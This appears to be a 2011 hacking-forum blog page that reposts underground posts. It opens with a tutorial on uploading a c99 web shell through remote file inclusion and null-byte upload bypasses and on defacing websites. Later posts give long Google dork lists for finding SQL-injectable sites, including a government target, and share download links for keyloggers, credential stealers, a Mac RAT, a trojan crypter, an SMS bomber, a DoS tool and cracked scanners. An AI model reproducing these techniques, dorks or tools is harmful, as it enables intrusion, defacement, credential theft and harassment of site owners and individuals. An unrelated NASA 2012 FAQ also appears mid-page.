2011 | Ksecurity-team

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Enter your email address:

Delivered by FeedBurner

[TuT]THE WAY, TO UPLOAD SHELL ON VULNERABLE SITES[TuT



#
The c99 shell is almost always used in remote file includes. That means that you get the remote server to 'host' the shell without any needing to upload it to take control over it. Read: RFI
#

#
A remote include works like this:
#

#

A website written in PHP includes files from a local directory. It usually looks something like this in the URL: "http://test.com/index.php?file=whatever" The part after the "?file=" is the locally included file. I'm really not going to get into how the RFI actually works, because it's beyond the scope of this. So, to include the file you would host it locally in a .txt and include it by doing : "http://test.com/index.php?file=http://yoursite.com/index.php?file=c99shell.txt?.php
#

#
Get it?
#
(I can't quite remember how to run it via URL because it's been so damn long since I've done it. lol)
#

#
Now, what Clover was talking about is using a Null Byte attack. You just upload your shell via an upload form. Because most forms filter out certain extensions uploading .php is almost impossible. With a Null Byte attack though, it's made possible.
#

#

Now, lets take our usual picture upload form. This form filters out extensions such as .exe, .js, .php, .xml and so on and so forth. So if you were to try and upload C:\My Documents\shell.php it would return an error. The Null Byte works around this simple security measure because a Null Byte can be used as a string terminator. In simple terms, it tells the server where the string ends. Now, how it works. As we know, if we try to upload with a .php extension, we get returned an error. If we add a Null Byte to that string, with an acceptable extension we can bypass the extension check of the form. The Null Byte is represented in simple text for as "". So, back to the upload form we go. As we go to upload our shell "C:\My Documents\shell.php" we will add to the end of that a Null Byte along with an extension. Now it looks something like this "C:\My Documents\shell.php.jpg"
#

#

(extra info: Most forms now prohibit the use of special characters such as %,#,@,*,$ just for this reason. Forms now also prevent the clicking in the text area to prevent the addition of string terminators" and the like)
#

#

Now, the problem that I always ran into when I first started using Null Byte attacks was that I could never find where it went. It would upload fine, but I could never actually execute the shell. This was worked around by using HTTPLiveHeaders (firefox addon). Monitoring while I uploaded the shell would give me the exact location of where the file was stored. Copy the destination of the uploaded file and paste into the URL bar and everything would work out from there. Of course, that is if the person doesn't have a script to automatically check the extension again and assign the proper one, or if they use a script to copy, move to another destination, and delete.
#

#

Everyone got it now?
#

#

If all things go according to plan, your shell shall be uploaded and you can now take control.

II)
---
Defacing a Site using a c99 shell
Okay first what is defacing? Well defacing is like you remove some contents of the site and show that it has been hacked by you. Defacing is a very good way of proving your a good hacker. Okay so lets get started
First you need a c99 shell, which can be easily found on google
Your antivirus might think its a virus but it isnt! Okay now you will need to find exploitable sites. Here are some ways to find it
Google Dork:
Quote:inurl:"upload.php"

Quote:inurl:"page=home.html"

Quote:inurl:"news/id="

That is one way of finding a c99 shell. See always upload a c99 shell with a .TXT or .JPG extension. You can change the extension but it wont change anything in the shell. I just leave mine as a c99.txt.
Another way of finding vulnerable sites is finding a random website that shows
Quote:http://site.com/page=

On that page= you can put your shell so it would look like
Quote:http://site.com/page=http://geocities.co...13/c99.txt

credits To RiTaLiN


Read More Add your Comment 3 comments


list of online SQLi scanners, Very handy




Read More Add your Comment 7 comments


[Release] Cryptinator - A simple Encryption Application



So today i decided to make a program like the following one i saw earlier.
[Image: 43201152623pm.png]

But instead of just copying it exactly, i used a different encryption algorithm (polystairs) and different methods towards generating/compiling a code.

Im not sure what you would have use for this, but for me when ever i need a completely random string i will use this now :D prolly for some other things but yea. Hope you guys enjoy it! :D

Cryptinator ScreenShot:
[Image: screenshotzu.png]

Virus Scan
Download


Read More Add your Comment 1 comments


UniCrack v1.0 Beta/Trial [Gmail,Hotmail,Live,Yahoo] Cracker



[Image: unicrack.gif]

UniCrack v1.0 [Download]

[VirusTotal Scan]

VirusTotal Detects 1/41

Ikarus T3.1.1.103.0 2011.04.22 HackTool.Win32.VB.jz

not really sure why ? false positive tho feel free to Sandbox / Virtual Machine your heart out.


Read More Add your Comment 5 comments


[Tool]MD5 Crack Fast



Screenshot:
[Image: WLGnn.jpg]
[Image: ?action=result_img&task_id=192d4...mage=1.png]

Pack Contains :

[]MD5 Crack Fast
Ultimate Distributed Cracker
Last Bit Md5 Password Cracker


Virus Scan - Analysis etc



[Image: D3Vxu.gif]
[Image: download-icon.gif] <--- PRESS THE BOX TO DOWNLOAD!

Please leave feedback/say thanks if you have downloaded it.


Read More Add your Comment 1 comments


iCrypt Err0r Version



his crypter makes ur trojan undetected

Never Upload @ virustotal use only NoVirusThanks.org

[Image: proggy.jpg]

Download



http://www.4shared.com/file/z1KjxfDn/iCr...rsion.html


Read More Add your Comment 0 comments


FREE Online Shell Checker [ Fast ][ VERY Reliable ][ Good for People With Slow Internet]



Hey, so here is an online shell checker

http://hf-alex.com/test/

Please do not click the "submit" button more than once and WAIT for it to load

I have used Curl so it should be fast and reliable

This is made more for reliability more than speed

this scans about 100 links in about 15-25 seconds

Once you see the submit button disappear the scan has finished..

The working urls will be in the box

This is very good for people with slow internet because all the checks are done server-side, that means all you have to do is wait for the checks to be done. The webpage is very small so it doesnt take up much bandwidth at all!
http://hackguide4u.blogspot.com Have fun and please say thanks if you used it :)
http://hackguide4u.blogspot.com


Read More Add your Comment 0 comments


Pre-Release] BlackHole RAT V2 [Test-Version]



Okay.. because some people have asked me "whats up with the next Version?" I will upload a Test-Version of the BlackHole RAT V2.

This Version is a little bit complicated to install and its untested!!

So what can you do with this Version?

- Execute Shell Comands remotly
- Chat with slave
- Read some Text on the slave Computer
- Display a Message
- Erase the HD
- Phish the Admin Password
- Block the Activity Monitor (after succsessfully phished Admin Pass)
- Shutdown, Reboot, Sleep and kill the Finder.app


What does this Version do?

- Adds itself to the Startup Items
- Is at the moment FUD
- Hidden From Dock, runs in background


What are the known Problems?

- Installation is a little bit complicated
- Server opens many Ports
- On every boot there will pop up a Window


Known Bugs?

- Server crashes when closing the Chat
- iSight Photo is not send complete
- ScreenShot function does not work in this Version


Okay now You know that all.. but this is only to show you what you can do with this on a Mac Computer. I will try to fix all Bugs and Problems as fast as I can.

Installation:

1. Start the Install.command
2. Drag&Drop the Files asked in the Terminal Window
3. After Installation finished, close the Terminal and reboot
4. Connect with the Client


To use the Block Activity Window Function, do this:

1. Open the Block Script with Apple-ScriptEditor
2. Enter the slave Admin Pass where it says "enteradminpasswordhere"
3. Save as Programm named "Block"
4. Copy to /Applications/JavaUpdater/Data/Block.app on the Victims Computer
5. Now you can use the Block function with the Client


I hope you will like this.Thumbsup

Note: The Client works on Windows AND Mac.

Here are some pics:



And here is the Total Virus scan:


I hope you will like it;)

Downloadlink: http://www.mediafire.com/?3nzk25p2jz8gjd1


Read More Add your Comment 0 comments


Youtube Link-bucks click increaser - [2000+ REAL clicks]



The view increaser feature in my youtube bot doesn't work as well as it use to ever since youtube's recent updates so i tested how well it would work on link-bucks and it makes 2000+ clicks per day, think i should add a link-bucks clicker feature to my bot? is 2000+ clicks any good?

[Image: logo_4.jpg]


Read More Add your Comment 2 comments


TeV DoS Tool | Easy DoS



This easy DoS tool was made by Elixed_ in java.
Direct download: https://www.dropbox.com/s/v7vb8ikl47kd8wl/TeV%20DoS.rar
Mirrors:

Virus scan: http://vscan.novirusthanks.org/analysis/...zLWV4ZQ==/

No idea why that moron virus scanner says that its a virus lol.

Created this almost a year ago, just found it at my old laptop and was like, why not post on HF.


It only go down for you when your own internet is shit. Else it will be down for everyone, it uses your internet connection.
http://www.downforeveryoneorjustme.com/


For the people that really wants a screen:


Read More Add your Comment 0 comments


Sql Poizon v1.1 - Sqli Exploit Scanner, Search Hunter, Injection Builder Tool



Greetings All,

After a very successfull release of Sql Poizon v1.0, The Exploit Scanner Tool, I am hereby introducing you with the new release which is more handy. It has new features as well as bug fixes from the older release. Please take a look for it below:

New Features:
"Look n Feel" is more attractive now.
Rich "Context Menu" items.
"Results" contain checkboxes to enable selection.
"Selected Dork" box is editable now for user convenience.
Built-in Browser for "Injection Builder" to check the impact of injection.
"Text Bucket" available for "Injection Builder" to save extra data.
"Insert Order By" button is added to "Injection Builder".
"Internet Browser" with Snapshot and HTML DOM Tree.

Bug Fixes:
It wont get stucked after pressing the stop button. Just a minor wait can occur which is okay.
Progress bar for "Crawler" has been fixed. It will show correct progress now.
Error on importing file is fixed now. You can import files from other directories as well.
"Searchqu" shows invalid results. It is fixed now.

Sql Poizon v1.1 - Sqli Exploit Scanner, Search Hunter, Injection Builder Tool

[Image: scannert.png]
[Image: crawler.png]
[Image: injectionbuilder.png]
[Image: browsere.png]
[Image: sqlerrorlist.png]
[Image: aboutdx.png]

Download:
[Image: injectionorange.png]Link
Please rate me for this.

p0!z0neR



Read More Add your Comment 1 comments


xuhaid SQLi Scanner V3



xuhaid SQLi Scanner V3 ✩
--Status:[online]--


I HIGHLY recommend you to use this SQLi Scanner, and not .exe tools!
Side Note: Better dork = more results! Keep that in mind!


Ok In This Version We have 2 New Scanner's Public & Private ... And In this Version I have added Duplicate Link remover Soo that after scanning you guys can easily remove duplicate Links.

Private Online SQLi Scanner V1
*Click here to Access*

Public Online SQLi Scanner V1
*Click here to Access*

Private Online Sqli Scanner V2 Source Code edited By XuhaiD (Only Vulnerable Sites )
*Click here to Access*

Public Online Sqli Scanner V2 Source Code edited By XuhaiD (Only Vulnerable Sites )
*Click here to Access*

Ok Public Version Will Log Your Links Which you'll Scan In Our Scanner For Those who hate scanning websites For more info Check here : http://sqlscanner.info/Public-Sql-Scanne...index.html

Public Scanner Version 1 Logger here : http://sqlscanner.info/Public-Sql-Scanner/v1log.txt

Public Scanner Version 2 Logger here : http://sqlscanner.info/Public-Sql-Scanner/v2log.txt

After Scanning You can Now easily Remove Links with one Click From here : http://sqlscanner.info/Repeatremover.html

About Version 2 If you Guys Dnt know This will Scan Only Vulnerable Sites
Example :
[Image: sql.GIF]

Dork List :

Code:
inurl:php?=id+gov
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:recruit_details.php?id=
inurl:index.php?cPath=

Quote:Use online sqli scanner (scan specific: websites/domains/countries)

Code:
www.sqlscanner.info

Quote:How to: Scan specific websites

Just use it like this:
inurl:php?id=+site:[domain of website]

you can either change it like:
inurl:php?page=+site:[domain of website]
inurl:php?type=+site:[domain of website]

If by any chance it fail's just put inurl or allinurl instead of site, like this:
inurl:php?id=+inurl:[domain of website]
inurl:php?id=+allinurl:[domain of website]

Examples:

If you want to scan specif countries websites:
for example .pt websites:
inurl:php?type=+site:.pt
or .br:
inurl:php?type=+site:.br

If you want to scan: http://www.thurrock.gov.uk
use: inurl:php?=id+site:thurrock.gov.uk

If You Face Any Kinda Problem Can Contact Me Online Here
: [Image: image.php?id=01]
Or reply to this thread - If you find Scanner stopped Working Lemme know i have another server i will release the link of that server

Private Online Scanner V1 Credits : R3miCk

Private Online Scanner V2 Credits : R3miCk ( Edited By me )

Public Online Scanner V1 Credits : R3miCk ( Edited By Me )

Public Online Scanner V2 Credits : R3miCk ( Edited By me )

Remove Duplicate : By Me ( XuhaiD )

Scan Specific Website Domain Credits : Hack.addict.pt

sqlscanner.info Index Page Credit's : th3-Outlaw Tools

Enjoy


Read More Add your Comment 0 comments


[VB.NET]How to make a nice GUI!



How to make a nice GUI!

Download SkinCrafter Light: Here

Open Visual Basic.
Go to toolbox at "Data" and right click "Choose Items..."

Click Browse... and select C:\Program Files\SkinCrafter3\skincrafter.net-vs2005 light\SkinCrafter.Net VS2005\skincrafter.net-vs2005_light.dll.

[Image: 37498571.png]

Press OK.

Now it will be here:

[Image: dataq.png]

Drag it to your form.

Go to its properties and select skin from here:

[Image: 12804104.jpg]

I always use Black_Pearl_st to my programs :D

[Image: 77122036.png]

Hope I helped you with this tutorial! :cool:


Read More Add your Comment 2 comments


HD VIDEO TUTORIAL; How to watch old youtube videos in High Quality and more.




Read More Add your Comment 1 comments


iStealer 6.3




Read More Add your Comment 0 comments


Turn Your Firefox into a Stealer Without any Software-Video {TuT}*




Read More Add your Comment 1 comments


Beaver's SMS Bomber Pro



Features Include:
Full Feature List:
Custom SMTP Server (Make Sure You Type It Right)
Custom Carrier Gateway (If Your Victims Gateway Is Not In The Large List You May Find And Enter it Yourself)
Custom Number Of SMS To Send (Finally Have Where You Can Enter Any Amount To Send)
Save/Load Settings (Will Save Everything You Enter In The Fields, Restarting Your Computer Will Lose The Saved Settings)
Fixed XP GUI Issues
Stop Bombing At Any Time
Watch The Number Of SMS Sent In The Title Bar
No Longer Freezes While Sending
Added A Recent slave's Box Where You Can Select An Entry And Right-Click It To Bomb It Again Or Delete It From The List
Save/Load Recent Victims List

GMail Is The Default SMTP Server That Is Used Which Has A Limit On The Number That Can Be Sent
Has A Lot Of Carriers Already Pre-Entered For You.
SMS Looks Like

FRM: Senders Email
SUBJ: Subject
MSG: Message

What Is New In The Pro Version:
New GUI
Error Handling, For Example If There Was An Error Sending The Message It Will Ask You If You Want To Change The E-mail/Password You Are Using. This Is Just One Of The Many Error Handling I Have Added.
[Image: 1XB4F.png]

DOWNLOAD :

Code:
http://rapidshare.com/#!download|536tl2|335533492|Beaver_s_SMS_Bomber_Pro.exe|1089

LINK to External Forums :
Code:
http://hotfile.com/links/98601927/b9d67df/Beaver_s_SMS_Bomber_Pro.rar

PASSWORD For external Forums :
Code:
smsbomberpro


Read More Add your Comment 2 comments


ACUNETIX VER 7.0 cracked Working and UPDATEABLE!!



ACUNETIX VER 7.0 cracked Working and UPDATEABLE!!

I have checked in : Windows xp desktop Pc and windows 7 Ultimate Laptop and is working and also is UPDATEABLE!! ..

But please only use in Vmware because i am not 100 % if is clean ...

Thanks...



Download Info

Code:
http://www.multiupload.com/EECTPQMDUH


Read More Add your Comment 0 comments


Pangolin Professional working TestEd



am ussing about 1-2 weeks and is working .. is allot better then Havij because cane work with https and also you cane upload files with load file function .. if the magic quetes are right ///

also please use only in vmware because i am not sure if is 100 % clean .. i have used in Vmware under windows xp ..


Download Info

Code:
http://www.multiupload.com/H5NWYJSASK


Read More Add your Comment 1 comments


TEAM p0ison shell private leaked!!contains great features of bypassing safe



[ Features ]
- Mass Defacement Tool
- Safe Mode Bypass
- Open_Basedir Bypass
- Fixed SQL managed
- FTP Brute Force Tool
- Fully Undetected
And more...
i can't attach ! :-??

Direct Link:

http://www.up.iranblog.com/images/zx2p8r...vdodzi.rar


Read More Add your Comment 1 comments


[TUT] Hack about 80% of every website out there



All right,

You kids need to stop asking for someone else to hack your "friends" forum, your girlfriends myspace page, etc.

You want to learn to hack, stop asking stupid questions.

There is ONE tool, that was created originally to protect from hackers. Unfortunately, it's one of the best friends a hacker will ever have :

It's called Acunetix.

Acunetix is a tool that scans websites for known vulnerabilities. It will list all possible sql, xss, html injections, all java injections, all passwords and database weaknesses, all ftp weaknesses, etc. All form submissions exploits that the website can be targeted with. Remote upload and download vulnerabilities.

It will work in 80% of the cases, its database is updated regularly, but websites with latest updates and a good admin might not be targetable.

So here's the thing. Before you post anymore questions such as : "Can this website be hacked ?" or "How do I hack this forum ?", download Acunetix in the link below (I couldn't be bothered uploading a new one).

DOWNLOAD :
HERE

PASSWORD : hf.net
(Uploaded by me, 100% clean)

Simply install it and copy the crack folder content into your Acunetix folder (replace files), and when you start the program, click on New Scan, follow the steps (my 10 year old brother could do this).


It will answer most of your questions. Take any known website, scan them and you'll find lots of little "medium risk" security problems etc. The program will explain what the potential harms are, not how to do them. The rest is up to you, do a bit of research, learn by yourself.

So use Acunetix, and stop asking stupid things that just make people think you have a pea for a brain.

Oh, and last tip : http://www.google.com is your friend. Don't forget it before you ask anything else.


Read More Add your Comment 2 comments


Darkjumper v5.8 Sqli,Lfi,Rfi,Rce scanner



Darkjumper v5.8 Sqli,Lfi,Rfi,Rce scanner

Darkjumper is a free tool what will try to find every website that hosts at the same server as your target. Then check for every vulnerability of each website that host at the same server.

Here are some key features of "Darkjumper":

· scan sql injection, rfi, lfi, blind sql injection
· autosql injector
· proxy support
· verbocity
· autoftp bruteforcer
· IP or Proxy checker and GeoIP

Requirements:

· Python

Screenshot: http://gunslingerc0de.files.wordpress.co...jumper.png

Download link: http://mac.softpedia.com/get/Security/Darkjumper.shtml


Read More Add your Comment 0 comments


Sql Poizon v1.1 - Sqli Exploit Scanner, Search Hunter, Injection Builder Tool



l Poizon v1.1 - Sqli Exploit Scanner, Search Hunter, Injection Builder Tool

Greetings All,

After a very successfull release of Sql Poizon v1.0, The Exploit Scanner Tool, I am hereby introducing you with the new release which is more handy. It has new features as well as bug fixes from the older release. Please take a look for it below:

New Features:
"Look n Feel" is more attractive now.
Rich "Context Menu" items.
"Results" contain checkboxes to enable selection.
"Selected Dork" box is editable now for user convenience.
Built-in Browser for "Injection Builder" to check the impact of injection.
"Text Bucket" available for "Injection Builder" to save extra data.
"Insert Order By" button is added to "Injection Builder".
"Internet Browser" with Snapshot and HTML DOM Tree.

Bug Fixes:
It wont get stucked after pressing the stop button. Just a minor wait can occur which is okay.
Progress bar for "Crawler" has been fixed. It will show correct progress now.
Error on importing file is fixed now. You can import files from other directories as well.
"Searchqu" shows invalid results. It is fixed now.
Download:
http://rapidshare.com/#!download|27l35|4...ol.rar|374

LINK TO External Forums :
http://hotfile.com/dl/97694563/d3f96e3/S...l.rar.html

PASSWORD For External Forums :
Code:
sqlinjection200


Read More Add your Comment 0 comments


ALL IN ONE




Read More Add your Comment 0 comments


REMOTE PENETRATION:



Remote penetration was developed by hackhound.org and is a great stealer with ftp and email delivery.
It Currently steals:

  • Trillian
  • Pidgin and Gaim
  • PaltalkScene
  • Digsby
  • Live Messenger
  • MSN Messenger
  • AIM 6.xx (Private Version only)
  • Miranda  (Private Version only)
  • Google Talk (Private Version only)(NEW)
  • Firefox 2.xx - 3.xx
  • IE6
  • IE7 - 8
  • Filezilla
  • Smart FTP
  • FlashFXP
  • CoreFTP
  • NO-IP
  • DynDNS
  • Outlook
  • CamFrog (NEW)
  • Custom CD-Key Grabber (Input own path to key you want to grab)

DOWNLOADS:
RemotePenetration v160.rar
Remote Penetration v2.1.rar
download both versions here: http://hackhound.org/forum/index.php?topic=10046.0


Read More Add your Comment 0 comments


ZH Stealer




Read More Add your Comment 1 comments


ARDAMAX 2.8



SERIALS:
format is (USERNAME:SERIAL)
hackforums:PGJPHQCCQATJJQK
hack forums:PGJPUHQBRTFSLIV
transmissionhacking.tk:UQLUVOWATPSQUGN
http://www.transmissionhacking.tk:TVOGOUOWTTUUSOR
transmission hacking:UQLUVOWATPSQXNL
serial:PKTNKNDLSPMOFXL
serials:PKTNKNDAIBUJQRT
transmission:UQLUVOWATPSQRQL
hacking:PGJPSPIQMJWROMT
a:IGFTVNSPEOQDFYT
b:FHFTVNSPEOQDFYT
c:GIFTVNSPEOQDFYT
d:LJFTVNSPEOQDFYT
e:MKFTVNSPEOQDFYT
f:JLFTVNSPEOQDFYT
g:KMFTJNSPEOQDFYT
h:PNFTVNSPEOQDFYT
i:QOFTVNSPEOQDFYT
j:NPFTVNSPEOQDFYT
k:OQFTVNSPEOQDFYT
owned:SVOJFQYWIMSDFNT
yes its a keygen:AKSRSODWMWWFDMH


DOWNLOAD: http://www.mediafire.com/?mv3djoowgne


Read More Add your Comment 0 comments


Cyber Keylogger




Read More Add your Comment 2 comments


TRANSMISSION'S SIMPLE KEYLOGGER




HOW TO USE: Simply open the program and it will log everything typed, i am hopefully going to release a new version with the ability to minimize to tray but im not sure how to do it yet :( pm me if you could help ill send you the source
DOWNLOAD: http://www.mediafire.com/download.php?zqmzoh1jgym


Read More Add your Comment 5 comments


Digital Keylogger 3.2 and 3.3




Read More Add your Comment 1 comments


General Keylogger




Read More Add your Comment 1 comments


Fresh Keylogger




Read More Add your Comment 1 comments


Easy Logger




Read More Add your Comment 0 comments


Krey gmail logger




Read More Add your Comment 0 comments


Logic Logger v1.0




Read More Add your Comment 0 comments


Cyber Logger




Read More Add your Comment 0 comments


Keylogger v1.1 by D4rK3y




Read More Add your Comment 1 comments


Gids Keylogger




Read More Add your Comment 1 comments


2012: Beginning of the End or Why the World Won't End?



2012: Beginning of the End or Why the World Won't End?
11.06.09
 
Scenes from the upcoming film 2012. Courtesy Columbia Pictures. Scenes from the motion picture "2012." Courtesy Columbia Pictures. Remember the Y2K scare? It came and went without much of a whimper because of adequate planning and analysis of the situation. Impressive movie special effects aside, Dec. 21, 2012, won't be the end of the world as we know. It will, however, be another winter solstice.

Much like Y2K, 2012 has been analyzed and the science of the end of the Earth thoroughly studied. Contrary to some of the common beliefs out there, the science behind the end of the world quickly unravels when pinned down to the 2012 timeline. Below, NASA Scientists answer several questions that we're frequently asked regarding 2012.

Question (Q): Are there any threats to the Earth in 2012? Many Internet websites say the world will end in December 2012.
Answer (A): Nothing bad will happen to the Earth in 2012. Our planet has been getting along just fine for more than 4 billion years, and credible scientists worldwide know of no threat associated with 2012.

Q: What is the origin of the prediction that the world will end in 2012?
A: The story started with claims that Nibiru, a supposed planet discovered by the Sumerians, is headed toward Earth. This catastrophe was initially predicted for May 2003, but when nothing happened the doomsday date was moved forward to December 2012. Then these two fables were linked to the end of one of the cycles in the ancient Mayan calendar at the winter solstice in 2012 -- hence the predicted doomsday date of December 21, 2012.

Q: Does the Mayan calendar end in December 2012?
A: Just as the calendar you have on your kitchen wall does not cease to exist after December 31, the Mayan calendar does not cease to exist on December 21, 2012. This date is the end of the Mayan long-count period but then -- just as your calendar begins again on January 1 -- another long-count period begins for the Mayan calendar.

Q: Could a phenomena occur where planets align in a way that impacts Earth?
A: There are no planetary alignments in the next few decades, Earth will not cross the galactic plane in 2012, and even if these alignments were to occur, their effects on the Earth would be negligible. Each December the Earth and sun align with the approximate center of the Milky Way Galaxy but that is an annual event of no consequence.

"There apparently is a great deal of interest in celestial bodies, and their locations and trajectories at the end of the calendar year 2012. Now, I for one love a good book or movie as much as the next guy. But the stuff flying around through cyberspace, TV and the movies is not based on science. There is even a fake NASA news release out there..."
- Don Yeomans, NASA senior research scientist
Q: Is there a planet or brown dwarf called Nibiru or Planet X or Eris that is approaching the Earth and threatening our planet with widespread destruction?
A: Nibiru and other stories about wayward planets are an Internet hoax. There is no factual basis for these claims. If Nibiru or Planet X were real and headed for an encounter with the Earth in 2012, astronomers would have been tracking it for at least the past decade, and it would be visible by now to the naked eye. Obviously, it does not exist. Eris is real, but it is a dwarf planet similar to Pluto that will remain in the outer solar system; the closest it can come to Earth is about 4 billion miles.

Q: What is the polar shift theory? Is it true that the earth’s crust does a 180-degree rotation around the core in a matter of days if not hours?
A: A reversal in the rotation of Earth is impossible. There are slow movements of the continents (for example Antarctica was near the equator hundreds of millions of years ago), but that is irrelevant to claims of reversal of the rotational poles. However, many of the disaster websites pull a bait-and-shift to fool people. They claim a relationship between the rotation and the magnetic polarity of Earth, which does change irregularly, with a magnetic reversal taking place every 400,000 years on average. As far as we know, such a magnetic reversal doesn’t cause any harm to life on Earth. A magnetic reversal is very unlikely to happen in the next few millennia, anyway.

The Blue Marble: Next GenerationEarth, as seen in the Blue Marble: Next Generation collection of images, showing the color of the planet's surface in high resolution. This image shows South America from September 2004. Q: Is the Earth in danger of being hit by a meteor in 2012?
A: The Earth has always been subject to impacts by comets and asteroids, although big hits are very rare. The last big impact was 65 million years ago, and that led to the extinction of the dinosaurs. Today NASA astronomers are carrying out a survey called the Spaceguard Survey to find any large near-Earth asteroids long before they hit. We have already determined that there are no threatening asteroids as large as the one that killed the dinosaurs. All this work is done openly with the discoveries posted every day on the NASA NEO Program Office website, so you can see for yourself that nothing is predicted to hit in 2012.

Q: How do NASA scientists feel about claims of pending doomsday?
A: For any claims of disaster or dramatic changes in 2012, where is the science? Where is the evidence? There is none, and for all the fictional assertions, whether they are made in books, movies, documentaries or over the Internet, we cannot change that simple fact. There is no credible evidence for any of the assertions made in support of unusual events taking place in December 2012.

Q: Is there a danger from giant solar storms predicted for 2012?
A: Solar activity has a regular cycle, with peaks approximately every 11 years. Near these activity peaks, solar flares can cause some interruption of satellite communications, although engineers are learning how to build electronics that are protected against most solar storms. But there is no special risk associated with 2012. The next solar maximum will occur in the 2012-2014 time frame and is predicted to be an average solar cycle, no different than previous cycles throughout history.

Addition information concerning 2012 is available on the Web, at:


Read More Add your Comment 0 comments


[PhP] Online sqli Scanner V2 * NeW* By XuhaiD



xuhaid SQLi Scanner ✩
--Status:[online]--


I HIGHLY recommend you to use this SQLi Scanner, and not .exe tools!
Side Note: Better dork = more results! Keep that in mind!


Online SQLi Scanner V1
*Click here to Access*

Online Sqli Scanner V2 Source Code edited By XuhaiD (Only Vulnerable Sites )
*Click here to Access*
Example :
[Image: sql.GIF]

One of the biggest List :

http://media1.filefront.com/personal/0/DorksForSQLi.txt?b17f4b620c6cf1393ffa644c10eea1511655babdda1b415c754bb9b5b15273cc9904cb4a098d ​ 4e567b7a0f62cb87677e4be94ae191a5c4bb9a6aa4c85ec7cf3e6249b231778e2d6b74cf9778bbd7 ​c021b59c2bb6e9bf9e518a5e6e836e557935956f7851b1d77391144cb009
Code:
inurl:php?=id+gov
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
